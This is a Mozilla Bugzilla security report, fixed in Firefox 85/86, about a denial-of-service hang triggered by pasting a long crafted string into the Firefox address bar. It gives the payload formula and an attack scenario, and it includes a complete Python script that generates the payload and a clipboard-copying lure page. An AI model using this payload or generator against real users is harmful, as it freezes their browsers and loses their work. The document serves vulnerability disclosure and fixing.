Closed Bug 1684667 Opened 3 years ago Closed 3 years ago

Firefox stops responding after pasting payload in search/address bar.

Categories

(Firefox :: Address Bar, defect, P2)

Points:
3

Tracking

RESOLVED FIXED
86 Branch
Iteration:
86.3 - Jan 11 - Jan 24
Tracking Status
firefox-esr78 --- wontfix
firefox84 --- wontfix
firefox85 --- fixed
firefox86 --- fixed

People

(Reporter: 7rp, Assigned: mak)

References

(Blocks 1 open bug)

Details

(Keywords: csectype-dos, hang, sec-low, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(2 files)

Attached file check.html

Summary:
I found strange behavior when I paste a long crafted URL in the search/address bar. I should mention that I use default settings in all browsers, so my address and search bars are not separated.
Steps to reproduce:

  1. Visit the attached HTML page and click the "Click here!" button. I viewed it locally, but you can put it anywhere, it doesn't matter. You can also manually generate the payload and copy it to your clipboard.
  2. Paste your clipboard contents in the search/address bar. It's not required to press Enter, and anyway, the browser will freeze before you can press any button.
  3. The browser will stop responding (CPU consumption will be too high).
    Payload:
    Can be crafted with Python, or any programming language.
    Consists of two parts: 'https://google.com/?id=2' + '<div="" class="">a</div></div></div><!---></div>' * 10000
    You can use any domain in the first part, and different multipliers in the second part. The multiplier affects CPU consumption: higher multiplier -> higher consumption. I suppose 10000 will be enough to freeze Firefox on almost all processors.
    Tested on Windows 10 Pro and Kali Linux:
    Firefox Browser latest (84.0.1)
    Firefox ESR latest (78.6.0esr)
    Attack scenario:
    The victim copies/clicks anything on the attacker's website, and then tries to search for it via the bar. Firefox will freeze, the victim will force quit, and all work in other tabs will be lost.
    Despite the fact that the impact is relatively low, it can be an indicator of a more serious bug. It also affects different browser editions and platforms, so I think it is worth reporting.
Flags: sec-bounty?
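The payload construction described in the report, as an added example: this is not the reporter's attached check.html (which is not reproduced on this page) nor Mozilla code. The base URL and the repeated fragment are taken from the report; the default multiplier of 10000 matches the report, while the output file names, the page layout, and the use of navigator.clipboard.writeText for the copy step are assumptions. The generator builds the string, wraps it in a page whose button copies it to the clipboard on a user gesture, and escapes every "<" inside the embedded JS literal so the fragment's markup and the "<!--" it contains cannot be interpreted by the HTML parser of the test page itself.

```python
"""Generate the address-bar hang payload from the report and a test page
that copies it to the clipboard.

Added example, not the reporter's attachment. BASE_URL and FRAGMENT come
from the report; file names, page markup and the clipboard API choice are
assumptions made here.
"""
import json
import sys

BASE_URL = "https://google.com/?id=2"
FRAGMENT = '<div="" class="">a</div></div></div><!---></div>'


def build_payload(base_url: str = BASE_URL, multiplier: int = 10000) -> str:
    """Return base_url followed by FRAGMENT repeated `multiplier` times.

    Per the report the multiplier only scales CPU time; the shape of the
    string (a URL prefix followed by a long run of markup) is what matters.
    """
    if multiplier < 1:
        raise ValueError("multiplier must be >= 1")
    return base_url + FRAGMENT * multiplier


def js_string_literal(text: str) -> str:
    """Encode `text` as a JS string literal that is safe inside <script>.

    json.dumps produces a valid JS string, but leaves '<' untouched; a
    payload containing '</script>' or '<!--' would then alter how the HTML
    parser tokenizes the script block. Escaping '<' as \\u003c keeps the
    literal identical at runtime while removing every '<' from the markup.
    """
    return json.dumps(text).replace("<", "\\u003c")


def build_check_html(payload: str) -> str:
    """Return an HTML page with a button that copies `payload` to the clipboard.

    navigator.clipboard.writeText requires a user gesture (assumed here to be
    the button click), which mirrors the "Click here!" step in the report.
    """
    literal = js_string_literal(payload)
    return f"""<!doctype html>
<meta charset="utf-8">
<title>check</title>
<button id="go">Click here!</button>
<p id="status"></p>
<script>
const payload = {literal};
document.getElementById("go").addEventListener("click", async () => {{
  await navigator.clipboard.writeText(payload);
  document.getElementById("status").textContent =
    "copied " + payload.length + " characters; now paste into the address bar";
}});
</script>
"""


def write_artifacts(multiplier: int, html_path: str = "check.html",
                    payload_path: str = "payload.txt") -> int:
    """Write both artifacts and return the payload length in characters."""
    payload = build_payload(multiplier=multiplier)
    with open(payload_path, "w", encoding="utf-8") as f:
        f.write(payload)
    with open(html_path, "w", encoding="utf-8") as f:
        f.write(build_check_html(payload))
    return len(payload)


if __name__ == "__main__":
    # Usage: python gen_payload.py [multiplier]; start low on a machine you care about.
    mult = int(sys.argv[1]) if len(sys.argv) > 1 else 10000
    n = write_artifacts(mult)
    print(f"wrote payload.txt ({n} chars) and check.html (multiplier={mult})")
```

When retesting a fix such as the one discussed later in this bug, run the generator with a small multiplier first and increase it; the report states that CPU time scales with the multiplier, so a fixed build should stay responsive at 10000 while an affected one hangs well before Enter is pressed.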
Attached file Generated payload

(In reply to Daniel Veditz [:dveditz] from comment #4)

> Can confirm. The reporter filed the iOS variant as bug 1684754 so I'll be hiding the comments related to that.

I suppose that bug 1684754 has a different root cause, affecting another component (not the address bar), so I originally reported it separately. I've filed 1685067 to cover the scenarios that were mentioned in the comments here.

Bug 1589602 is still open for long strings being slow, even if we caught the most common cases already. But it's likely this is about recognizing the kind of string, for which we fixed a similar bug a few versions ago.
I'll profile it and see.

Assignee: nobody → mak
Severity: -- → S3
Priority: -- → P2
Points: --- → 3
Iteration: --- → 86.3 - Jan 11 - Jan 24

I suspect bug 1682434 reduced the problem here a lot; from the profile I see us spending time in the same area.
Could you please test with Firefox 85+?

The only other thing we could do here, which I actually plan to do, is to avoid highlighting fallback URL heuristic results; they are the full URL anyway, making them fully bold doesn't bring any benefit and rather makes them less readable. It is an expensive highlight that has no real purpose.

Flags: needinfo?(7rp)

I filed Bug 1687767 about another couple of things where we can save some time to improve perf. Along with bug 1682434 it should pretty much affect the code path this bug is about.

(In reply to Marco Bonardo [:mak] from comment #7)

> I suspect bug 1682434 reduced the problem here a lot; from the profile I see us spending time in the same area.
> Could you please test with Firefox 85+?
>
> The only other thing we could do here, which I actually plan to do, is to avoid highlighting fallback URL heuristic results; they are the full URL anyway, making them fully bold doesn't bring any benefit and rather makes them less readable. It is an expensive highlight that has no real purpose.

Can confirm, I couldn't reproduce the bug on Firefox Browser 85.0, Windows 10.

Flags: needinfo?(7rp)

Thanks, it sounds like we're done here, the bug was fixed by bug 1682434, and performance was further improved with Bug 1687767.

I'm not setting any dependencies to avoid disclosing connections between this bug and the other public ones.

I don't think the cost of uplift is worth it for ESR78, considering this is an uncommon DoS in the Address Bar and a sec-low. Feel free to chime in if you think differently.

Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED
Target Milestone: --- → 86 Branch

(In reply to Marco Bonardo [:mak] from comment #10)

> Thanks, it sounds like we're done here, the bug was fixed by bug 1682434, and performance was further improved with Bug 1687767.
>
> I'm not setting any dependencies to avoid disclosing connections between this bug and the other public ones.
>
> I don't think the cost of uplift is worth it for ESR78, considering this is an uncommon DoS in the Address Bar and a sec-low. Feel free to chime in if you think differently.

Absolutely agreed. Is it worth requesting a CVE for that?

That's a question for the security team.

Flags: needinfo?(dveditz)

(In reply to Marco Bonardo [:mak] from comment #10)

> I'm not setting any dependencies to avoid disclosing connections between this bug and the other public ones.

A year or so ago Bugzilla was fixed so that dependencies aren't shown if you can't see the hidden bug: it's OK to add these now. NOTE: "See Also" items are still 100% visible. So far only depends on/blocks/regressed by/regressions were fixed.

(In reply to Marco Bonardo [:mak] from comment #12)

> [worth requesting a CVE?] That's a question for the security team.

You can ask (send mail to security@mozilla.org), but I don't know if we'd issue a CVE for a DOS like this.

Depends on: 1682434, 1687767
Flags: needinfo?(dveditz)
Flags: sec-bounty? → sec-bounty-
Group: firefox-core-security → core-security-release
Group: core-security-release